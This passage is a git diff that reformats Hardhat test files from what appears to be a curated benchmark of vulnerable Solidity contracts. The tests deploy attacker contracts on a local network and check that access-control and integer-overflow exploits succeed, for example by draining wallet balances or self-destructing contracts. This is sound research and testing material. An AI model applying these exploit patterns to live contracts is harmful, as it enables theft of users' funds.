{ expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/simple_suicide.sol', function () { +describe("attack access_control/simple_suicide.sol", function () { let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/simple_suicide.sol/SimpleSuicide.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const SimpleSuicide = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await SimpleSuicide.connect(owner).deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/simple_suicide.sol/SimpleSuicide.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const SimpleSuicide = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await SimpleSuicide.connect(owner).deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const SimpleSuicideAttacker = await ethers.getContractFactory('contracts/access_control/simple_suicide_attack.sol:SimpleSuicideAttacker'); - const attacker = await SimpleSuicideAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const SimpleSuicideAttacker = await ethers.getContractFactory( + "contracts/access_control/simple_suicide_attack.sol:SimpleSuicideAttacker", + ); + const attacker = await SimpleSuicideAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: access_control/simple_suicide.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(owner).sudicideAnyone(owner)).to.not.be.reverted; - }); + it("sanity check: access_control/simple_suicide.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(owner).sudicideAnyone(owner)).to.not.be + .reverted; + }); - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - expect(await ethers.provider.getCode(await victim.getAddress())).not.to.equal("0x"); - await attacker.attack(); - expect(await ethers.provider.getCode(await victim.getAddress())).to.equal("0x"); - }); - }); \ No newline at end of file + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + expect( + await ethers.provider.getCode(await victim.getAddress()), + ).not.to.equal("0x"); + await attacker.attack(); + expect(await ethers.provider.getCode(await victim.getAddress())).to.equal( + "0x", + ); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/unprotected0_test.js b/smartbugs-curated/0.4.x/test/access_control/unprotected0_test.js index 81329ea..a8c53c7 100644 --- a/smartbugs-curated/0.4.x/test/access_control/unprotected0_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/unprotected0_test.js @@ -1,33 +1,42 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/unprotected0.sol', function () { +describe("attack access_control/unprotected0.sol", function () { let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/unprotected0.sol/Unprotected.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Unprotected = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Unprotected.connect(owner).deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/unprotected0.sol/Unprotected.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Unprotected = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await Unprotected.connect(owner).deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const UnprotectedAttacker = await ethers.getContractFactory('contracts/access_control/unprotected0_attack.sol:UnprotectedAttacker'); - const attacker = await UnprotectedAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const UnprotectedAttacker = await ethers.getContractFactory( + "contracts/access_control/unprotected0_attack.sol:UnprotectedAttacker", + ); + const attacker = await UnprotectedAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: access_control/unprotected0.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.connect(owner).changeOwner(owner)).to.not.be.reverted; - }); + it("sanity check: access_control/unprotected0.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.connect(owner).changeOwner(owner)).to.not.be.reverted; + }); - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - - await expect( attacker.attack(await attacker.getAddress())).to.not.be.reverted; - }); - }); \ No newline at end of file + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + + await expect(attacker.attack(await attacker.getAddress())).to.not.be + .reverted; + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/wallet_02_refund_nosub_test.js b/smartbugs-curated/0.4.x/test/access_control/wallet_02_refund_nosub_test.js index 30fe0de..869b42a 100644 --- a/smartbugs-curated/0.4.x/test/access_control/wallet_02_refund_nosub_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/wallet_02_refund_nosub_test.js @@ -1,54 +1,62 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/wallet_02_refund_nosub.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/wallet_02_refund_nosub.sol/Wallet.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Wallet = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Wallet.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); +describe("attack access_control/wallet_02_refund_nosub.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/wallet_02_refund_nosub.sol/Wallet.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Wallet = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Wallet.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const WalletAttacker = await ethers.getContractFactory('contracts/access_control/wallet_02_refund_nosub_attack.sol:WalletAttacker'); - const attacker = await WalletAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const WalletAttacker = await ethers.getContractFactory( + "contracts/access_control/wallet_02_refund_nosub_attack.sol:WalletAttacker", + ); + const attacker = await WalletAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: access_control/wallet_02_refund_nosub.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.deposit({value: 1})).to.not.be.reverted; - await expect(victim.withdraw(1)).to.not.be.reverted; - }); + it("sanity check: access_control/wallet_02_refund_nosub.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.deposit({ value: 1 })).to.not.be.reverted; + await expect(victim.withdraw(1)).to.not.be.reverted; + }); - - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const [v, a] = await ethers.getSigners(); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - const amount = ethers.parseEther("1.0"); + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const [v, a] = await ethers.getSigners(); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + const amount = ethers.parseEther("1.0"); - await victim.connect(v).deposit({value: amount}); + await victim.connect(v).deposit({ value: amount }); - const smallerAmount = ethers.parseEther("0.1"); - await a.sendTransaction({ - to: attacker_addr, - value: smallerAmount, - }); - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceBefore).to.equal(amount); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceBefore).to.equal(smallerAmount); - - const options = {value: smallerAmount}; - await attacker.attack(options); - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount + smallerAmount); + const smallerAmount = ethers.parseEther("0.1"); + await a.sendTransaction({ + to: attacker_addr, + value: smallerAmount, }); - }); \ No newline at end of file + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceBefore).to.equal(amount); + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceBefore).to.equal(smallerAmount); + + const options = { value: smallerAmount }; + await attacker.attack(options); + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + const attackerBalanceAfter = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceAfter - attackerBalanceBefore).to.equal( + amount + smallerAmount, + ); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/wallet_03_wrong_constructor_test.js b/smartbugs-curated/0.4.x/test/access_control/wallet_03_wrong_constructor_test.js index f53956b..15bdf77 100644 --- a/smartbugs-curated/0.4.x/test/access_control/wallet_03_wrong_constructor_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/wallet_03_wrong_constructor_test.js @@ -1,51 +1,57 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/wallet_03_wrong_constructor.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/wallet_03_wrong_constructor.sol/Wallet.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Wallet = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Wallet.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); - - const WalletAttacker = await ethers.getContractFactory('contracts/access_control/wallet_03_wrong_constructor_attack.sol:WalletAttacker'); - const attacker = await WalletAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } - - it('sanity check: access_control/wallet_03_wrong_constructor.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.deposit({value: 1})).to.not.be.reverted; - await expect(victim.withdraw(1)).to.not.be.reverted; - }); - - - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const [v, a] = await ethers.getSigners(); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - const amount = ethers.parseEther("1.0"); - - await victim.connect(v).deposit({value: amount}); - - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceBefore).to.equal(amount); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceBefore).to.equal(0); - - await expect(attacker.test()).to.be.reverted; - await attacker.attack(); - await expect(attacker.test()).to.not.be.reverted; - - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceAfter).to.equal(amount); - }); - }); \ No newline at end of file +describe("attack access_control/wallet_03_wrong_constructor.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/wallet_03_wrong_constructor.sol/Wallet.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Wallet = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Wallet.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); + + const WalletAttacker = await ethers.getContractFactory( + "contracts/access_control/wallet_03_wrong_constructor_attack.sol:WalletAttacker", + ); + const attacker = await WalletAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } + + it("sanity check: access_control/wallet_03_wrong_constructor.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.deposit({ value: 1 })).to.not.be.reverted; + await expect(victim.withdraw(1)).to.not.be.reverted; + }); + + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const [v, a] = await ethers.getSigners(); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + const amount = ethers.parseEther("1.0"); + + await victim.connect(v).deposit({ value: amount }); + + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceBefore).to.equal(amount); + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceBefore).to.equal(0); + + await expect(attacker.test()).to.be.reverted; + await attacker.attack(); + await expect(attacker.test()).to.not.be.reverted; + + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + const attackerBalanceAfter = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceAfter).to.equal(amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/wallet_04_confused_sign_test.js b/smartbugs-curated/0.4.x/test/access_control/wallet_04_confused_sign_test.js index 3babe8d..09dbec7 100644 --- a/smartbugs-curated/0.4.x/test/access_control/wallet_04_confused_sign_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/wallet_04_confused_sign_test.js @@ -1,49 +1,57 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/wallet_04_confused_sign.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/wallet_04_confused_sign.sol/Wallet.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Wallet = await ethers.getContractFactory('contracts/dataset/access_control/wallet_04_confused_sign.sol:Wallet'); - const victim = await Wallet.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); - - const WalletAttacker = await ethers.getContractFactory('contracts/access_control/wallet_04_confused_sign_attack.sol:WalletAttacker'); - const attacker = await WalletAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } - - it('sanity check: access_control/wallet_04_confused_sign.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.deposit({value: 1})).to.not.be.reverted; - await expect(victim.withdraw(1)).to.not.be.reverted; - }); - - - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const [v, a] = await ethers.getSigners(); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - const amount = ethers.parseEther("1.0"); - - await victim.connect(v).deposit({value: amount}); - - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceBefore).to.equal(amount); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceBefore).to.equal(0); - - await attacker.attack(); - - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker_addr); - expect(attackerBalanceAfter).to.equal(amount); - }); - }); \ No newline at end of file +describe("attack access_control/wallet_04_confused_sign.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/wallet_04_confused_sign.sol/Wallet.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Wallet = await ethers.getContractFactory( + "contracts/dataset/access_control/wallet_04_confused_sign.sol:Wallet", + ); + const victim = await Wallet.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); + + const WalletAttacker = await ethers.getContractFactory( + "contracts/access_control/wallet_04_confused_sign_attack.sol:WalletAttacker", + ); + const attacker = await WalletAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } + + it("sanity check: access_control/wallet_04_confused_sign.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.deposit({ value: 1 })).to.not.be.reverted; + await expect(victim.withdraw(1)).to.not.be.reverted; + }); + + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const [v, a] = await ethers.getSigners(); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + const amount = ethers.parseEther("1.0"); + + await victim.connect(v).deposit({ value: amount }); + + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceBefore).to.equal(amount); + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceBefore).to.equal(0); + + await attacker.attack(); + + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + const attackerBalanceAfter = + await ethers.provider.getBalance(attacker_addr); + expect(attackerBalanceAfter).to.equal(amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/BECToken_test.js b/smartbugs-curated/0.4.x/test/arithmetic/BECToken_test.js index d0df0db..8a762a7 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/BECToken_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/BECToken_test.js @@ -1,28 +1,33 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/BECToken.sol', function () { +describe("attack arithmetic/BECToken.sol", function () { let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/BECToken.sol/BecToken.json'); + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/BECToken.sol/BecToken.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); const BECToken = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await BECToken.connect(owner).deploy(); + const victim = await BECToken.connect(owner).deploy(); await victim.waitForDeployment(); - const BecTokenAttacker = await ethers.getContractFactory('contracts/arithmetic/BECToken_attack.sol:BecTokenAttacker'); - const attacker = await BecTokenAttacker.deploy(); + const BecTokenAttacker = await ethers.getContractFactory( + "contracts/arithmetic/BECToken_attack.sol:BecTokenAttacker", + ); + const attacker = await BecTokenAttacker.deploy(); await attacker.waitForDeployment(); - return {victim, attacker}; - } + return { victim, attacker }; + } - it('sanity check: arithmetic/BECToken.sol', async function () { - const {victim} = await loadFixture(deployContracts); + it("sanity check: arithmetic/BECToken.sol", async function () { + const { victim } = await loadFixture(deployContracts); const balance = await victim.balanceOf(victim.target); expect(balance).to.equal(0); const ownerBalance = await victim.balanceOf(await owner.address); @@ -32,17 +37,15 @@ describe('attack arithmetic/BECToken.sol', function () { expect(newBalance).to.equal(10); const newOwnerBalance = await victim.balanceOf(await owner.address); expect(newOwnerBalance).to.equal(ownerBalance - newBalance); - }); - - - it('exploit overflow vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - - expect(await victim.balanceOf(attacker_addr)).to.equal(0); - await attacker.attack(victim_addr); - expect(await victim.balanceOf(attacker_addr)).to.greaterThan(0); - }); - - }); \ No newline at end of file + }); + + it("exploit overflow vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + + expect(await victim.balanceOf(attacker_addr)).to.equal(0); + await attacker.attack(victim_addr); + expect(await victim.balanceOf(attacker_addr)).to.greaterThan(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_1_test.js b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_1_test.js index dd270d6..64a84cc 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_1_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_1_test.js @@ -1,51 +1,56 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/integer_overflow_1.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/integer_overflow_1.sol/Overflow.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Overflow = await ethers.getContractFactory(json.abi, json.bytecode); - const overflow = await Overflow.deploy(); - await overflow.waitForDeployment(); - const address = await overflow.getAddress(); +describe("attack arithmetic/integer_overflow_1.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/integer_overflow_1.sol/Overflow.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Overflow = await ethers.getContractFactory(json.abi, json.bytecode); + const overflow = await Overflow.deploy(); + await overflow.waitForDeployment(); + const address = await overflow.getAddress(); - const OverflowAttacker = await ethers.getContractFactory('contracts/arithmetic/integer_overflow_1_attack.sol:OverflowAttacker'); - const attacker = await OverflowAttacker.deploy(address); - await attacker.waitForDeployment(); - - return {overflow, attacker}; - } + const OverflowAttacker = await ethers.getContractFactory( + "contracts/arithmetic/integer_overflow_1_attack.sol:OverflowAttacker", + ); + const attacker = await OverflowAttacker.deploy(address); + await attacker.waitForDeployment(); - it('sanity check: arithmetic/integer_overflow_1.sol', async function () { - const {overflow} = await loadFixture(deployContracts); - let storage = await ethers.provider.getStorage(overflow.target, 0); - let value = Number(storage); - expect(value).to.be.equal(0); - await overflow.add(1); - storage = await ethers.provider.getStorage(overflow.target, 0); - value = Number(storage); - expect(value).to.be.equal(1); - }); - - it('exploit overflow vulnerability', async function () { - const {overflow,attacker} = await loadFixture(deployContracts); - let storage = await ethers.provider.getStorage(overflow.target, 0); - let value = Number(storage); - expect(value).to.be.equal(0); - const max = 2**256 - 1; - // make the sellerBalance to be the maximum value - await attacker.addMax(); - storage = await ethers.provider.getStorage(overflow.target, 0); - value = Number(storage); - expect(value).to.be.equal(max); - - // cause the overflow - await overflow.add(1); - storage = await ethers.provider.getStorage(overflow.target, 0); - value = Number(storage); - expect(value).to.be.equal(0); - }); - }); \ No newline at end of file + return { overflow, attacker }; + } + + it("sanity check: arithmetic/integer_overflow_1.sol", async function () { + const { overflow } = await loadFixture(deployContracts); + let storage = await ethers.provider.getStorage(overflow.target, 0); + let value = Number(storage); + expect(value).to.be.equal(0); + await overflow.add(1); + storage = await ethers.provider.getStorage(overflow.target, 0); + value = Number(storage); + expect(value).to.be.equal(1); + }); + + it("exploit overflow vulnerability", async function () { + const { overflow, attacker } = await loadFixture(deployContracts); + let storage = await ethers.provider.getStorage(overflow.target, 0); + let value = Number(storage); + expect(value).to.be.equal(0); + const max = 2 ** 256 - 1; + // make the sellerBalance to be the maximum value + await attacker.addMax(); + storage = await ethers.provider.getStorage(overflow.target, 0); + value = Number(storage); + expect(value).to.be.equal(max); + + // cause the overflow + await overflow.add(1); + storage = await ethers.provider.getStorage(overflow.target, 0); + value = Number(storage); + expect(value).to.be.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_add_test.js b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_add_test.js index 8dda013..73ee6a8 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_add_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_add_test.js @@ -1,34 +1,42 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/integer_overflow_add.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/integer_overflow_add.sol/IntegerOverflowAdd.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const IntegerOverflowAdd = await ethers.getContractFactory(json.abi, json.bytecode); - const overflow = await IntegerOverflowAdd.deploy(); - await overflow.waitForDeployment(); - const address = await overflow.getAddress(); +describe("attack arithmetic/integer_overflow_add.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/integer_overflow_add.sol/IntegerOverflowAdd.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const IntegerOverflowAdd = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const overflow = await IntegerOverflowAdd.deploy(); + await overflow.waitForDeployment(); + const address = await overflow.getAddress(); - const IntegerOverflowAddAttacker = await ethers.getContractFactory('contracts/arithmetic/integer_overflow_add_attack.sol:IntegerOverflowAddAttacker'); - const attacker = await IntegerOverflowAddAttacker.deploy(address); - await attacker.waitForDeployment(); - return {overflow, attacker}; - } + const IntegerOverflowAddAttacker = await ethers.getContractFactory( + "contracts/arithmetic/integer_overflow_add_attack.sol:IntegerOverflowAddAttacker", + ); + const attacker = await IntegerOverflowAddAttacker.deploy(address); + await attacker.waitForDeployment(); + return { overflow, attacker }; + } - it('sanity check: arithmetic/integer_overflow_add.sol', async function () { - const {overflow} = await loadFixture(deployContracts); - expect(await overflow.count()).to.equal(1); - await overflow.run(1); - expect(await overflow.count()).to.equal(2); - }); - - it('exploit overflow vulnerability', async function () { - const {overflow, attacker} = await loadFixture(deployContracts); - expect(await overflow.count()).to.equal(1); - await attacker.attack(); - expect(await overflow.count()).to.equal(0); - }); - }); \ No newline at end of file + it("sanity check: arithmetic/integer_overflow_add.sol", async function () { + const { overflow } = await loadFixture(deployContracts); + expect(await overflow.count()).to.equal(1); + await overflow.run(1); + expect(await overflow.count()).to.equal(2); + }); + + it("exploit overflow vulnerability", async function () { + const { overflow, attacker } = await loadFixture(deployContracts); + expect(await overflow.count()).to.equal(1); + await attacker.attack(); + expect(await overflow.count()).to.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_mapping_sym_1_test.js b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_mapping_sym_1_test.js index 62fd5be..e8f12c6 100644 --- a/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_mapping_sym_1_test.js +++ b/smartbugs-curated/0.4.x/test/arithmetic/integer_overflow_mapping_sym_1_test.js @@ -1,63 +1,81 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack arithmetic/integer_overflow_mapping_sym_1.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/arithmetic/integer_overflow_mapping_sym_1.sol/IntegerOverflowMappingSym1.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const IntegerOverflowMappingSym1 = await ethers.getContractFactory(json.abi, json.bytecode); - const overflow = await IntegerOverflowMappingSym1.deploy(); - await overflow.waitForDeployment(); - return {overflow}; - } - - it('sanity check: arithmetic/integer_overflow_mapping_sym_1.sol', async function () { - const {overflow} = await loadFixture(deployContracts); - const mappingSlot = BigInt(0); // map is at slot 0 - const key = BigInt(0); // We want to find map[0] - - // Compute keccak256 hash for storage slot - const storageSlot = ethers.keccak256( - ethers.AbiCoder.defaultAbiCoder().encode( - ["uint256", "uint256"], - [key, mappingSlot] - ) - ); - - let storedValue = await ethers.provider.getStorage(overflow.target, storageSlot); - let value = Number(storedValue); - expect(value).to.be.equal(0); - await overflow.init(0, 0); - storedValue = await ethers.provider.getStorage(overflow.target, storageSlot); - value = Number(storedValue); - expect(value).to.be.equal(0); - }); - - it('exploit overflow vulnerability', async function () { - const {overflow} = await loadFixture(deployContracts); - - const mappingSlot = BigInt(0); // map is at slot 0 - const key = BigInt(0); // We want to find map[0] - - // Compute keccak256 hash for storage slot - const storageSlot = ethers.keccak256( - ethers.AbiCoder.defaultAbiCoder().encode( - ["uint256", "uint256"], - [key, mappingSlot] - ) - ); - - let storedValue = await ethers.provider.getStorage(overflow.target, storageSlot); - let value = Number(storedValue); - expect(value).to.be.equal(0); - - await overflow.init(0, 1); - - storedValue = await ethers.provider.getStorage(overflow.target, storageSlot); - value = Number(storedValue); - const max = 2**256 - 1; - expect(value).to.be.equal(max); - }); - }); \ No newline at end of file +describe("attack arithmetic/integer_overflow_mapping_sym_1.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/arithmetic/integer_overflow_mapping_sym_1.sol/IntegerOverflowMappingSym1.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const IntegerOverflowMappingSym1 = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const overflow = await IntegerOverflowMappingSym1.deploy(); + await overflow.waitForDeployment(); + return { overflow }; + } + + it("sanity check: arithmetic/integer_overflow_mapping_sym_1.sol", async function () { + const { overflow } = await loadFixture(deployContracts); + const mappingSlot = BigInt(0); // map is at slot 0 + const key = BigInt(0); // We want to find map[0] + + // Compute keccak256 hash for storage slot + const storageSlot = ethers.keccak256( + ethers.AbiCoder.defaultAbiCoder().encode( + ["uint256", "uint256"], + [key, mappingSlot], + ), + ); + + let storedValue = await ethers.provider.getStorage( + overflow.target, + storageSlot, + ); + let value = Number(storedValue); + expect(value).to.be.equal(0); + await overflow.init(0, 0); + storedValue = await ethers.provider.getStorage( + overflow.target, + storageSlot, + ); + value = Number(storedValue); + expect(value).to.be.equal(0); + }); + + it("exploit overflow vulnerability", async function () { + const { overflow } = await loadFixture(deployContracts); + + const mappingSlot = BigInt(0); // map is at slot 0 + const key = BigInt(0); 